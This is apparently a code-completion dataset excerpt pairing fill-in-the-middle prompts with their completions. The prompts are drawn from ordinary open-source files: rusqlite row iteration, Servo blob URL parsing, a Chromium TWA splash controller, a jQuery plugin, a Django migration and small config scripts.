prompt (large_string, lengths 70–991k) | completion (large_string, lengths 0–1.02k)
---|---
<|file_name|>row.rs<|end_file_name|><|fim▁begin|>use fallible_iterator::FallibleIterator;
use fallible_streaming_iterator::FallibleStreamingIterator;
use std::convert;
use super::{Error, Result, Statement};
use crate::types::{FromSql, FromSqlError, ValueRef};
/// A handle to the resulting rows of a query.
#[must_use = "Rows is lazy and will do nothing unless consumed"]
pub struct Rows<'stmt> {
pub(crate) stmt: Option<&'stmt Statement<'stmt>>,
row: Option<Row<'stmt>>,
}
impl<'stmt> Rows<'stmt> {
#[inline]
fn reset(&mut self) {
if let Some(stmt) = self.stmt.take() {
stmt.reset();
}
}
/// Attempt to get the next row from the query. Returns `Ok(Some(Row))` if
/// there is another row, `Err(...)` if there was an error
/// getting the next row, and `Ok(None)` if all rows have been retrieved.
///
/// ## Note
///
/// This interface is not compatible with Rust's `Iterator` trait, because
/// the lifetime of the returned row is tied to the lifetime of `self`.
/// This is a fallible "streaming iterator". For a more natural interface,
/// consider using [`query_map`](crate::Statement::query_map) or [`query_and_then`](crate::Statement::query_and_then) instead, which
/// return types that implement `Iterator`.
#[allow(clippy::should_implement_trait)] // cannot implement Iterator
#[inline]
pub fn next(&mut self) -> Result<Option<&Row<'stmt>>> {
self.advance()?;
Ok((*self).get())
}
/// Map over this `Rows`, converting it to a [`Map`], which
/// implements `FallibleIterator`.
/// ```rust,no_run
/// use fallible_iterator::FallibleIterator;
/// # use rusqlite::{Result, Statement};
/// fn query(stmt: &mut Statement) -> Result<Vec<i64>> {
/// let rows = stmt.query([])?;
/// rows.map(|r| r.get(0)).collect()
/// }
/// ```
// FIXME Hide FallibleStreamingIterator::map
#[inline]
pub fn map<F, B>(self, f: F) -> Map<'stmt, F>
where
F: FnMut(&Row<'_>) -> Result<B>,
{
Map { rows: self, f }
}
/// Map over this `Rows`, converting it to a [`MappedRows`], which
/// implements `Iterator`.
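/// A sketch mirroring the `map` example above, but via plain `Iterator`
/// (the query and column are illustrative):
/// ```rust,no_run
/// # use rusqlite::{Result, Statement};
/// fn query(stmt: &mut Statement) -> Result<Vec<i64>> {
///     let rows = stmt.query([])?;
///     rows.mapped(|r| r.get(0)).collect()
/// }
/// ```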
#[inline]
pub fn mapped<F, B>(self, f: F) -> MappedRows<'stmt, F>
where
F: FnMut(&Row<'_>) -> Result<B>,
{
MappedRows { rows: self, map: f }
}
/// Map over this `Rows` with a fallible function, converting it to an
/// [`AndThenRows`], which implements `Iterator` (instead of
/// `FallibleStreamingIterator`).
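/// A sketch with a custom error type; `MyError` is an illustrative
/// stand-in for any type implementing `From<Error>`:
/// ```rust,no_run
/// # use rusqlite::{Error, Statement};
/// # struct MyError;
/// # impl From<Error> for MyError { fn from(_: Error) -> Self { MyError } }
/// fn query(stmt: &mut Statement) -> Result<Vec<i64>, MyError> {
///     let rows = stmt.query([])?;
///     rows.and_then(|r| r.get(0).map_err(MyError::from)).collect()
/// }
/// ```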
#[inline]
pub fn and_then<F, T, E>(self, f: F) -> AndThenRows<'stmt, F>
where
F: FnMut(&Row<'_>) -> Result<T, E>,
{
AndThenRows { rows: self, map: f }
}
}
impl<'stmt> Rows<'stmt> {
#[inline]
pub(crate) fn new(stmt: &'stmt Statement<'stmt>) -> Rows<'stmt> {
Rows {
stmt: Some(stmt),
row: None,
}
}
#[inline]
pub(crate) fn get_expected_row(&mut self) -> Result<&Row<'stmt>> {
match self.next()? {
Some(row) => Ok(row),
None => Err(Error::QueryReturnedNoRows),
}
}
}
impl Drop for Rows<'_> {
#[inline]
fn drop(&mut self) {
self.reset();
}
}
/// `F` is used to transform the _streaming_ iterator into a _fallible_ iterator.
#[must_use = "iterators are lazy and do nothing unless consumed"]
pub struct Map<'stmt, F> {
rows: Rows<'stmt>,
f: F,
}
impl<F, B> FallibleIterator for Map<'_, F>
where
F: FnMut(&Row<'_>) -> Result<B>,
{
type Error = Error;
type Item = B;
#[inline]
fn next(&mut self) -> Result<Option<B>> {
match self.rows.next()? {
Some(v) => Ok(Some((self.f)(v)?)),
None => Ok(None),
}
}
}
/// An iterator over the mapped resulting rows of a query.
///
/// `F` is used to transform the _streaming_ iterator into a _standard_ iterator.
#[must_use = "iterators are lazy and do nothing unless consumed"]
pub struct MappedRows<'stmt, F> {
rows: Rows<'stmt>,
map: F,
}
impl<T, F> Iterator for MappedRows<'_, F>
where
F: FnMut(&Row<'_>) -> Result<T>,
{
type Item = Result<T>;
#[inline]
fn next(&mut self) -> Option<Result<T>> {
let map = &mut self.map;
self.rows
.next()
.transpose()
.map(|row_result| row_result.and_then(|row| (map)(&row)))
}
}
/// An iterator over the mapped resulting rows of a query, whose error type
/// `E` unifies with `Error` via `From<Error>`.
#[must_use = "iterators are lazy and do nothing unless consumed"]
pub struct AndThenRows<'stmt, F> {
rows: Rows<'stmt>,
map: F,
}
impl<T, E, F> Iterator for AndThenRows<'_, F>
where
E: convert::From<Error>,
F: FnMut(&Row<'_>) -> Result<T, E>,
{
type Item = Result<T, E>;
#[inline]
fn next(&mut self) -> Option<Self::Item> {
let map = &mut self.map;
self.rows
.next()
.transpose()
.map(|row_result| row_result.map_err(E::from).and_then(|row| (map)(&row)))
}
}
/// `FallibleStreamingIterator` differs from the standard library's `Iterator`
/// in two ways:
/// * each call to `next` (sqlite3_step) can fail.
/// * returned `Row` is valid until `next` is called again or `Statement` is
/// reset or finalized.
///
/// While these iterators cannot be used with Rust `for` loops, `while let`
/// loops offer a similar level of ergonomics:
/// ```rust,no_run
/// # use rusqlite::{Result, Statement};
/// fn query(stmt: &mut Statement) -> Result<()> {
/// let mut rows = stmt.query([])?;
/// while let Some(row) = rows.next()? {
/// // scan column values
/// }
/// Ok(())
/// }
/// ```
impl<'stmt> FallibleStreamingIterator for Rows<'stmt> {
type Error = Error;
type Item = Row<'stmt>;
#[inline]
fn advance(&mut self) -> Result<()> {
match self.stmt {
Some(ref stmt) => match stmt.step() {
Ok(true) => {
self.row = Some(Row { stmt });
Ok(())
}
Ok(false) => {
self.reset();
self.row = None;
Ok(())
}
Err(e) => {
self.reset();
self.row = None;
Err(e)
}
},
None => {
self.row = None;
Ok(())
}
}
}
#[inline]
fn get(&self) -> Option<&Row<'stmt>> {
self.row.as_ref()
}
}
/// A single result row of a query.
pub struct Row<'stmt> {
pub(crate) stmt: &'stmt Statement<'stmt>,
}
impl<'stmt> Row<'stmt> {
/// Get the value of a particular column of the result row.
///
/// ## Failure
///
/// Panics if calling [`row.get(idx)`](Row::get) would return an error,
/// including:
///
/// * If the underlying SQLite column type is not a valid type as a source
/// for `T`
/// * If the underlying SQLite integral value is outside the range
/// representable by `T`
/// * If `idx` is outside the range of columns in the returned query
pub fn get_unwrap<I: RowIndex, T: FromSql>(&self, idx: I) -> T {
self.get(idx).unwrap()
}
/// Get the value of a particular column of the result row.
///
/// ## Failure
///
/// Returns an `Error::InvalidColumnType` if the underlying SQLite column
/// type is not a valid type as a source for `T`.
///
/// Returns an `Error::InvalidColumnIndex` if `idx` is outside the valid
/// column range for this row.
///
/// Returns an `Error::InvalidColumnName` if `idx` is not a valid column
/// name for this row.
///
/// If the result type is i128 (which requires the `i128_blob` feature to be
/// enabled), and the underlying SQLite column is a blob whose size is not
/// 16 bytes, `Error::InvalidColumnType` will also be returned.
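/// A brief sketch (assuming the query's first column is an integer and a
/// column named "name" holds text):
/// ```rust,no_run
/// # use rusqlite::{Result, Row};
/// fn read(row: &Row<'_>) -> Result<(i64, String)> {
///     Ok((row.get(0)?, row.get("name")?))
/// }
/// ```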
pub fn get<I: RowIndex, T: FromSql>(&self, idx: I) -> Result<T> {
let idx = idx.idx(self.stmt)?;
let value = self.stmt.value_ref(idx);
FromSql::column_result(value).map_err(|err| match err {
FromSqlError::InvalidType => Error::InvalidColumnType(
idx,
self.stmt.column_name_unwrap(idx).into(),
value.data_type(),
),
FromSqlError::OutOfRange(i) => Error::IntegralValueOutOfRange(idx, i),
FromSqlError::Other(err) => {
Error::FromSqlConversionFailure(idx as usize, value.data_type(), err)
}
#[cfg(feature = "i128_blob")]
FromSqlError::InvalidI128Size(_) => Error::InvalidColumnType(
idx,
self.stmt.column_name_unwrap(idx).into(),
value.data_type(),
),
#[cfg(feature = "uuid")]
FromSqlError::InvalidUuidSize(_) => Error::InvalidColumnType(
idx,
self.stmt.column_name_unwrap(idx).into(),
value.data_type(),
),
})
}
/// Get the value of a particular column of the result row as a `ValueRef`,
/// allowing data to be read out of a row without copying.
///
/// This `ValueRef` is valid only as long as this `Row`, which is enforced by
/// its lifetime. This means that while this method is completely safe,
/// it can be somewhat difficult to use, and most callers will be better
/// served by [`get`](Row::get) or [`get_unwrap`](Row::get_unwrap).
///
/// ## Failure
///
/// Returns an `Error::InvalidColumnIndex` if `idx` is outside the valid
/// column range for this row.
///
/// Returns an `Error::InvalidColumnName` if `idx` is not a valid column
/// name for this row.
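/// A brief sketch (assuming column 0 holds text):
/// ```rust,no_run
/// # use rusqlite::{Result, Row};
/// fn read(row: &Row<'_>) -> Result<()> {
///     let name = row.get_ref(0)?.as_str()?; // borrowed, not copied
///     println!("{}", name);
///     Ok(())
/// }
/// ```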
pub fn get_ref<I: RowIndex>(&self, idx: I) -> Result<ValueRef<'_>> {
let idx = idx.idx(self.stmt)?;
// Narrowing from `ValueRef<'stmt>` (which `self.stmt.value_ref(idx)`
// returns) to `ValueRef<'a>` is needed because it's only valid until
// the next call to sqlite3_step.
let val_ref = self.stmt.value_ref(idx);
Ok(val_ref)
}
/// Get the value of a particular column of the result row as a `ValueRef`,
/// allowing data to be read out of a row without copying.
///
/// This `ValueRef` is valid only as long as this `Row`, which is enforced by
/// its lifetime. This means that while this method is completely safe,
/// it can be difficult to use, and most callers will be better served by
/// [`get`](Row::get) or [`get_unwrap`](Row::get_unwrap).
///
/// ## Failure
///
/// Panics if calling [`row.get_ref(idx)`](Row::get_ref) would return an error,
/// including:
///
/// * If `idx` is outside the range of columns in the returned query.
/// * If `idx` is not a valid column name for this row.
pub fn get_ref_unwrap<I: RowIndex>(&self, idx: I) -> ValueRef<'_> {
self.get_ref(idx).unwrap()
}
/// Renamed to [`get_ref`](Row::get_ref).
#[deprecated = "Use [`get_ref`](Row::get_ref) instead."]
#[inline]
pub fn get_raw_checked<I: RowIndex>(&self, idx: I) -> Result<ValueRef<'_>> {
self.get_ref(idx)
}
/// Renamed to [`get_ref_unwrap`](Row::get_ref_unwrap).
#[deprecated = "Use [`get_ref_unwrap`](Row::get_ref_unwrap) instead."]
#[inline]
pub fn get_raw<I: RowIndex>(&self, idx: I) -> ValueRef<'_> {
self.get_ref_unwrap(idx)
}
}
mod sealed {
/// This trait exists just to ensure that the only impls of `trait RowIndex`
/// that are allowed are ones in this crate.
pub trait Sealed {}
impl Sealed for usize {}
impl Sealed for &str {}
}
/// A trait implemented by types that can index into columns of a row.
///
/// It is only implemented for `usize` and `&str`.
pub trait RowIndex: sealed::Sealed {
/// Returns the index of the appropriate column, or `None` if no such
/// column exists.
fn idx(&self, stmt: &Statement<'_>) -> Result<usize>;
}
impl RowIndex for usize {
#[inline]
fn idx(&self, stmt: &Statement<'_>) -> Result<usize> {
if *self >= stmt.column_count() {
Err(Error::InvalidColumnIndex(*self))
} else {
Ok(*self)
}
}
}
impl RowIndex for &'_ str {
#[inline]
fn idx(&self, stmt: &Statement<'_>) -> Result<usize> {
stmt.column_index(*self)
}
}
macro_rules! tuple_try_from_row {
($($field:ident),*) => {
impl<'a, $($field,)*> convert::TryFrom<&'a Row<'a>> for ($($field,)*) where $($field: FromSql,)* {
type Error = crate::Error;
// we end with index += 1, which rustc warns about
// unused_variables and unused_mut are allowed for ()
#[allow(unused_assignments, unused_variables, unused_mut)]
fn try_from(row: &'a Row<'a>) -> Result<Self> {
let mut index = 0;
$(
#[allow(non_snake_case)]
let $field = row.get::<_, $field>(index)?;
index += 1;
)*
Ok(($($field,)*))
}
}
}
}
macro_rules! tuples_try_from_row {
() => {
// not very useful, but maybe some other macro users will find this helpful
tuple_try_from_row!();
};
($first:ident $(, $remaining:ident)*) => {
tuple_try_from_row!($first $(, $remaining)*);
tuples_try_from_row!($($remaining),*);
};
}
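// The recursion above peels one identifier off per step, so the invocation
// below generates a `TryFrom<&Row>` impl for every suffix of the list,
// i.e. for every tuple arity from 0 through 16.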
tuples_try_from_row!(A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P);
#[cfg(test)]
mod tests {
#![allow(clippy::redundant_closure)] // false positives due to lifetime issues; clippy issue #5594
use crate::{Connection, Result};
#[test]
fn test_try_from_row_for_tuple_1() -> Result<()> {
use crate::ToSql;
use std::convert::TryFrom;
let conn = Connection::open_in_memory()?;
conn.execute(
"CREATE TABLE test (a INTEGER)",
crate::params_from_iter(std::iter::empty::<&dyn ToSql>()),
)?;
conn.execute("INSERT INTO test VALUES (42)", [])?;
let val = conn.query_row("SELECT a FROM test", [], |row| <(u32,)>::try_from(row))?;
assert_eq!(val, (42,));
let fail = conn.query_row("SELECT a FROM test", [], |row| <(u32, u32)>::try_from(row));
assert!(fail.is_err());
Ok(())
}
#[test]
fn test_try_from_row_for_tuple_2() -> Result<()> {
use std::convert::TryFrom;
let conn = Connection::open_in_memory()?;
conn.execute("CREATE TABLE test (a INTEGER, b INTEGER)", [])?;
conn.execute("INSERT INTO test VALUES (42, 47)", [])?;
let val = conn.query_row("SELECT a, b FROM test", [], |row| {
<(u32, u32)>::try_from(row)
})?;
assert_eq!(val, (42, 47));
let fail = conn.query_row("SELECT a, b FROM test", [], |row| {
<(u32, u32, u32)>::try_from(row)
});
assert!(fail.is_err());
Ok(())
}
#[test]
fn test_try_from_row_for_tuple_16() -> Result<()> {
use std::convert::TryFrom;
let create_table = "CREATE TABLE test (
a INTEGER,
b INTEGER,
c INTEGER,
d INTEGER,
e INTEGER,
f INTEGER,
g INTEGER,
h INTEGER,
i INTEGER,
j INTEGER,
k INTEGER,
l INTEGER,
m INTEGER,
n INTEGER,
o INTEGER,
p INTEGER
)";
let insert_values = "INSERT INTO test VALUES (
0,
1,
2,
3,
4,
5,
6,
7,
8,
9,<|fim▁hole|> 14,
15
)";
type BigTuple = (
u32,
u32,
u32,
u32,
u32,
u32,
u32,
u32,
u32,
u32,
u32,
u32,
u32,
u32,
u32,
u32,
);
let conn = Connection::open_in_memory()?;
conn.execute(create_table, [])?;
conn.execute(insert_values, [])?;
let val = conn.query_row("SELECT * FROM test", [], |row| BigTuple::try_from(row))?;
// Debug is not implemented for tuples of 16
assert_eq!(val.0, 0);
assert_eq!(val.1, 1);
assert_eq!(val.2, 2);
assert_eq!(val.3, 3);
assert_eq!(val.4, 4);
assert_eq!(val.5, 5);
assert_eq!(val.6, 6);
assert_eq!(val.7, 7);
assert_eq!(val.8, 8);
assert_eq!(val.9, 9);
assert_eq!(val.10, 10);
assert_eq!(val.11, 11);
assert_eq!(val.12, 12);
assert_eq!(val.13, 13);
assert_eq!(val.14, 14);
assert_eq!(val.15, 15);
// We don't test one bigger because it's unimplemented
Ok(())
}
}<|fim▁end|>
|
10,
11,
12,
13,
|
<|file_name|>classes_5.js<|end_file_name|><|fim▁begin|><|fim▁hole|>];<|fim▁end|>
|
var searchData=
[
['rgb',['Rgb',['../structarctic_1_1_rgb.html',1,'arctic']]],
['rgba',['Rgba',['../structarctic_1_1easy_1_1_rgba.html',1,'arctic::easy']]]
|
<|file_name|>blob_url_store.rs<|end_file_name|><|fim▁begin|>/* This Source Code Form is subject to the terms of the Mozilla Public
* License, v. 2.0. If a copy of the MPL was not distributed with this
* file, You can obtain one at https://mozilla.org/MPL/2.0/. */<|fim▁hole|>use std::str::FromStr;
use url::Url;
use uuid::Uuid;
/// Errors returned for Blob URL Store requests
#[derive(Clone, Debug, Deserialize, PartialEq, Serialize)]
pub enum BlobURLStoreError {
/// Invalid File UUID
InvalidFileID,
/// Invalid URL origin
InvalidOrigin,
/// Invalid entry content
InvalidEntry,
/// Invalid range
InvalidRange,
/// External error, e.g. from the file system, I/O, etc.
External(String),
}
/// Standalone blob buffer object
#[derive(Clone, Debug, Deserialize, Serialize)]
pub struct BlobBuf {
pub filename: Option<String>,
/// MIME type string
pub type_string: String,
/// Size of content in bytes
pub size: u64,
/// Content of blob
pub bytes: Vec<u8>,
}
/// Parse a URL according to the Blob URL scheme's definition
///
/// <https://w3c.github.io/FileAPI/#DefinitionOfScheme>
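/// A sketch of the expected shape (UUID and origin are illustrative):
/// parsing `blob:https://example.com/3b0c...` yields that UUID together
/// with the origin `https://example.com`.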
pub fn parse_blob_url(url: &ServoUrl) -> Result<(Uuid, FileOrigin), ()> {
let url_inner = Url::parse(url.path()).map_err(|_| ())?;
let segs = url_inner
.path_segments()
.map(|c| c.collect::<Vec<_>>())
.ok_or(())?;
if url.query().is_some() || segs.len() > 1 {
return Err(());
}
let id = {
let id = segs.first().ok_or(())?;
Uuid::from_str(id).map_err(|_| ())?
};
Ok((id, get_blob_origin(&ServoUrl::from_url(url_inner))))
}
/// Given a URL, return the Origin that a Blob created under this
/// URL should have.
///
/// HACK(izgzhen): Not well-specified in the spec, and it is a bit of a hack,
/// both due to the ambiguity of the spec and because we have to serialize the
/// Origin here.
pub fn get_blob_origin(url: &ServoUrl) -> FileOrigin {
if url.scheme() == "file" {
// NOTE: by default this is "null" (Opaque), which is not ideal
"file://".to_string()
} else {
url.origin().ascii_serialization()
}
}<|fim▁end|>
|
use crate::filemanager_thread::FileOrigin;
use servo_url::ServoUrl;
|
<|file_name|>equalcolumnheight.js<|end_file_name|><|fim▁begin|>/*
* equalcolumnheight
* https://github.com/mortennajbjerg/jquery.equalcolumnheight
*
* Copyright (c) 2013 Morten Najbjerg
* Licensed under the GPLv3 license.
*/
(function($) {
$.fn.equalcolumnheight = function() {
var $this = $(this),
highest = 0;<|fim▁hole|> // Compute the tallest element's height and return it as an integer
var getHighestValue = function() {
var heights = getElementsHeight();
return Math.max.apply($this, heights );
};
// Return array of all element heights
var getElementsHeight = function() {
return $.map( $this , function(e){ return $(e).outerHeight(); });
};
// Set a height on all elements
var setElementsHeight = function(value) {
$this.css('height', value);
};
var init = function() {
setElementsHeight('auto');
highest = getHighestValue();
setElementsHeight(highest);
};
// Set resize
$( window ).resize(function() {
init();
});
// Make sure that this works even
// if the columns have images inside them
$( window ).load(function() {
init();
});
init();
};
}(jQuery));<|fim▁end|>
| |
<|file_name|>assert_.py<|end_file_name|><|fim▁begin|>from functions.str import w_str
from wtypes.control import WEvalRequired, WRaisedException, WReturnValue
from wtypes.exception import WException
from wtypes.magic_macro import WMagicMacro
from wtypes.boolean import WBoolean
class WAssert(WMagicMacro):
def call_magic_macro(self, exprs, scope):
if len(exprs) != 1:
raise Exception(
"Macro assert expected 1 argument. "
"Got {} instead.".format(len(exprs)))
expr = exprs[0]
src = w_str(expr)
def callback(_value):
if _value is WBoolean.false:
return WRaisedException(
exception=WException(f'Assertion failed: {src}'))
return WReturnValue(expr=_value)
<|fim▁hole|><|fim▁end|>
|
return WEvalRequired(expr=expr, callback=callback)
|
<|file_name|>0001_initial.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
]
operations = [
migrations.CreateModel(
name='Stat',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),<|fim▁hole|> ],
options={
},
bases=(models.Model,),
),
]<|fim▁end|>
|
('date', models.DateTimeField(auto_now_add=True)),
('up', models.BigIntegerField()),
('down', models.BigIntegerField()),
('live_time', models.BigIntegerField()),
|
<|file_name|>testem.js<|end_file_name|><|fim▁begin|>module.exports = {
framework: 'qunit',
test_page: 'tests/index.html?hidepassed',
disable_watching: true,
launch_in_ci: [
'Chrome'
],
launch_in_dev: [
'Chrome'
],
browser_args: {
Chrome: {
mode: 'ci',
args: [
// --no-sandbox is needed when running Chrome inside a container
process.env.TRAVIS ? '--no-sandbox' : null,
'--disable-gpu',<|fim▁hole|> ].filter(Boolean)
}
}
};<|fim▁end|>
|
'--headless',
'--no-sandbox',
'--remote-debugging-port=9222',
'--window-size=1440,900'
|
<|file_name|>index.js<|end_file_name|><|fim▁begin|>/*jslint node: true */
'use strict';
var _ = require('underscore.string'),<|fim▁hole|> path = require('path'),
chalk = require('chalk-log');
module.exports = function() {
return function (done) {
var prompts = [{
name: 'taglibName',
message: 'What is the name of your taglib or taglibs (comma-separated)?',
}, {
name: 'appName',
message: 'For which app (empty: global) ?'
}, {
type: 'confirm',
name: 'moveon',
message: 'Continue?'
}];
//Ask
inquirer.prompt(prompts,
function (answers) {
if (!answers.moveon) {
return done();
}
if (_.isBlank(answers.taglibName)) {
chalk.error('Taglib name can NOT be empty');
done();
}
answers.taglibName = _.clean(answers.taglibName);
var appPath = path.join('./apps', answers.appName);
var targetDir = _.isBlank(answers.appName) ? './apps/_global' : appPath;
var createTagLib = require('./create-taglib');
if (answers.taglibName.match(/,/)) {
var taglibs = answers.taglibName.split(',').map(function(taglib) {
return _.clean(taglib);
});
for (let taglib of taglibs) {
answers = {taglibName: taglib, appName: answers.appName};
createTagLib(answers, targetDir);
}
} else {
createTagLib(answers, targetDir);
}
}
);
};
};<|fim▁end|>
|
inquirer = require('inquirer'),
|
<|file_name|>TwaSplashController.java<|end_file_name|><|fim▁begin|>// Copyright 2019 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
package org.chromium.chrome.browser.browserservices.ui.splashscreen.trustedwebactivity;
import static android.view.ViewGroup.LayoutParams.MATCH_PARENT;
import static androidx.browser.trusted.TrustedWebActivityIntentBuilder.EXTRA_SPLASH_SCREEN_PARAMS;
import android.app.Activity;
import android.content.Intent;
import android.graphics.Bitmap;
import android.graphics.Color;
import android.graphics.Matrix;
import android.os.Bundle;
import android.view.View;
import android.view.ViewGroup;
import android.widget.ImageView;
import androidx.browser.customtabs.TrustedWebUtils;
import androidx.browser.trusted.TrustedWebActivityIntentBuilder;
import androidx.browser.trusted.splashscreens.SplashScreenParamKey;
import org.chromium.base.IntentUtils;
import org.chromium.chrome.browser.browserservices.intents.BrowserServicesIntentDataProvider;
import org.chromium.chrome.browser.browserservices.ui.splashscreen.SplashController;
import org.chromium.chrome.browser.browserservices.ui.splashscreen.SplashDelegate;
import org.chromium.chrome.browser.customtabs.TranslucentCustomTabActivity;
import org.chromium.chrome.browser.tab.Tab;
import org.chromium.ui.base.ActivityWindowAndroid;
import org.chromium.ui.util.ColorUtils;
import javax.inject.Inject;
/**
* Orchestrates the flow of showing and removing splash screens for apps based on Trusted Web
* Activities.
*
* The flow is as follows:
* - TWA client app verifies conditions for showing splash screen. If the checks pass, it shows the
* splash screen immediately.
* - The client passes the URI to a file with the splash image to
* {@link androidx.browser.customtabs.CustomTabsService}. The image is decoded and put into
* {@link SplashImageHolder}.
* - The client then launches a TWA, at which point the Bitmap is already available.
* - ChromeLauncherActivity calls {@link #handleIntent}, which starts
* {@link TranslucentCustomTabActivity} - a CustomTabActivity with translucent style. The
* translucency is necessary in order to avoid a flash that might be seen when starting the activity
* before the splash screen is attached.
* - {@link TranslucentCustomTabActivity} creates an instance of {@link TwaSplashController} which
* immediately displays the splash screen in an ImageView on top of the rest of view hierarchy.
* - It also immediately removes the translucency. See comment in {@link SplashController} for more
* details.
* - It waits for the page to load, and removes the splash image once first paint (or a failure)
* occurs.
*
* Lifecycle: this class is resolved only once when CustomTabActivity is launched, and is
* gc-ed when it finishes its job.
* If these lifecycle assumptions change, consider whether @ActivityScope needs to be added.
*/
public class TwaSplashController implements SplashDelegate {
// TODO(pshmakov): move this to AndroidX.
private static final String KEY_SHOWN_IN_CLIENT =
"androidx.browser.trusted.KEY_SPLASH_SCREEN_SHOWN_IN_CLIENT";
private final SplashController mSplashController;
private final Activity mActivity;
private final SplashImageHolder mSplashImageCache;
private final BrowserServicesIntentDataProvider mIntentDataProvider;
@Inject
public TwaSplashController(SplashController splashController, Activity activity,
ActivityWindowAndroid activityWindowAndroid, SplashImageHolder splashImageCache,
BrowserServicesIntentDataProvider intentDataProvider) {
mSplashController = splashController;
mActivity = activity;
mSplashImageCache = splashImageCache;
mIntentDataProvider = intentDataProvider;
long splashHideAnimationDurationMs =
IntentUtils.safeGetInt(getSplashScreenParamsFromIntent(),
SplashScreenParamKey.KEY_FADE_OUT_DURATION_MS, 0);
mSplashController.setConfig(this, splashHideAnimationDurationMs);
}
@Override
public View buildSplashView() {
Bitmap bitmap = mSplashImageCache.takeImage(mIntentDataProvider.getSession());
if (bitmap == null) {
return null;
}
ImageView splashView = new ImageView(mActivity);
splashView.setLayoutParams(new ViewGroup.LayoutParams(MATCH_PARENT, MATCH_PARENT));
splashView.setImageBitmap(bitmap);
applyCustomizationsToSplashScreenView(splashView);
return splashView;
}
@Override
public void onSplashHidden(Tab tab, long startTimestamp, long endTimestamp) {}
@Override
public boolean shouldWaitForSubsequentPageLoadToHideSplash() {
return false;
}
private void applyCustomizationsToSplashScreenView(ImageView imageView) {
Bundle params = getSplashScreenParamsFromIntent();
int backgroundColor = IntentUtils.safeGetInt(
params, SplashScreenParamKey.KEY_BACKGROUND_COLOR, Color.WHITE);
imageView.setBackgroundColor(ColorUtils.getOpaqueColor(backgroundColor));
int scaleTypeOrdinal =
IntentUtils.safeGetInt(params, SplashScreenParamKey.KEY_SCALE_TYPE, -1);
ImageView.ScaleType[] scaleTypes = ImageView.ScaleType.values();
ImageView.ScaleType scaleType;
if (scaleTypeOrdinal < 0 || scaleTypeOrdinal >= scaleTypes.length) {
scaleType = ImageView.ScaleType.CENTER;
} else {
scaleType = scaleTypes[scaleTypeOrdinal];
}
imageView.setScaleType(scaleType);
if (scaleType != ImageView.ScaleType.MATRIX) return;
float[] matrixValues = IntentUtils.safeGetFloatArray(
params, SplashScreenParamKey.KEY_IMAGE_TRANSFORMATION_MATRIX);
if (matrixValues == null || matrixValues.length != 9) return;
Matrix matrix = new Matrix();
matrix.setValues(matrixValues);
imageView.setImageMatrix(matrix);
}
private Bundle getSplashScreenParamsFromIntent() {
return mIntentDataProvider.getIntent().getBundleExtra(EXTRA_SPLASH_SCREEN_PARAMS);<|fim▁hole|> * Returns true if the intent corresponds to a TWA with a splash screen.
*/
public static boolean intentIsForTwaWithSplashScreen(Intent intent) {
boolean isTrustedWebActivity = IntentUtils.safeGetBooleanExtra(
intent, TrustedWebUtils.EXTRA_LAUNCH_AS_TRUSTED_WEB_ACTIVITY, false);
boolean requestsSplashScreen =
IntentUtils.safeGetParcelableExtra(intent, EXTRA_SPLASH_SCREEN_PARAMS) != null;
return isTrustedWebActivity && requestsSplashScreen;
}
/**
* Handles the intent if it should launch a TWA with splash screen.
* @param activity Activity, from which to start the next one.
* @param intent Incoming intent.
* @return Whether the intent was handled.
*/
public static boolean handleIntent(Activity activity, Intent intent) {
if (!intentIsForTwaWithSplashScreen(intent)) return false;
Bundle params = IntentUtils.safeGetBundleExtra(
intent, TrustedWebActivityIntentBuilder.EXTRA_SPLASH_SCREEN_PARAMS);
boolean shownInClient = IntentUtils.safeGetBoolean(params, KEY_SHOWN_IN_CLIENT, true);
// shownInClient is "true" by default for the following reasons:
// - For compatibility with older clients which don't use this bundle key.
// - Because getting "false" when it should be "true" leads to more severe visual glitches,
// than vice versa.
if (shownInClient) {
// If splash screen was shown in client, we must launch a translucent activity to
// ensure smooth transition.
intent.setClassName(activity, TranslucentCustomTabActivity.class.getName());
}
intent.addFlags(Intent.FLAG_ACTIVITY_NO_ANIMATION);
activity.startActivity(intent);
activity.overridePendingTransition(0, 0);
return true;
}
}<|fim▁end|>
|
}
/**
|
<|file_name|>overlay_scroll_bar.cc<|end_file_name|><|fim▁begin|>// Copyright 2013 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#include "ui/views/controls/scrollbar/overlay_scroll_bar.h"
#include <memory>
#include "base/bind.h"
#include "base/i18n/rtl.h"<|fim▁hole|>#include "third_party/skia/include/core/SkColor.h"
#include "ui/base/metadata/metadata_impl_macros.h"
#include "ui/color/color_id.h"
#include "ui/color/color_provider.h"
#include "ui/compositor/layer.h"
#include "ui/compositor/scoped_layer_animation_settings.h"
#include "ui/gfx/canvas.h"
#include "ui/native_theme/overlay_scrollbar_constants_aura.h"
#include "ui/views/background.h"
#include "ui/views/border.h"
#include "ui/views/layout/fill_layout.h"
namespace views {
namespace {
// Total thickness of the thumb (matches visuals when hovered).
constexpr int kThumbThickness =
ui::kOverlayScrollbarThumbWidthPressed + ui::kOverlayScrollbarStrokeWidth;
// When hovered, the thumb takes up the full width. Otherwise, it's a bit
// slimmer.
constexpr int kThumbHoverOffset = 4;
// The layout size of the thumb stroke, in DIP.
constexpr int kThumbStroke = ui::kOverlayScrollbarStrokeWidth;
// The visual size of the thumb stroke, in px.
constexpr int kThumbStrokeVisualSize = ui::kOverlayScrollbarStrokeWidth;
} // namespace
OverlayScrollBar::Thumb::Thumb(OverlayScrollBar* scroll_bar)
: BaseScrollBarThumb(scroll_bar), scroll_bar_(scroll_bar) {
// |scroll_bar| isn't done being constructed; it's not safe to do anything
// that might reference it yet.
}
OverlayScrollBar::Thumb::~Thumb() = default;
void OverlayScrollBar::Thumb::Init() {
SetFlipCanvasOnPaintForRTLUI(true);
SetPaintToLayer();
layer()->SetFillsBoundsOpaquely(false);
// Animate all changes to the layer except the first one.
OnStateChanged();
layer()->SetAnimator(ui::LayerAnimator::CreateImplicitAnimator());
}
gfx::Size OverlayScrollBar::Thumb::CalculatePreferredSize() const {
// The visual size of the thumb is kThumbThickness, but it slides back and
// forth by kThumbHoverOffset. To make event targetting work well, expand the
// width of the thumb such that it's always taking up the full width of the
// track regardless of the offset.
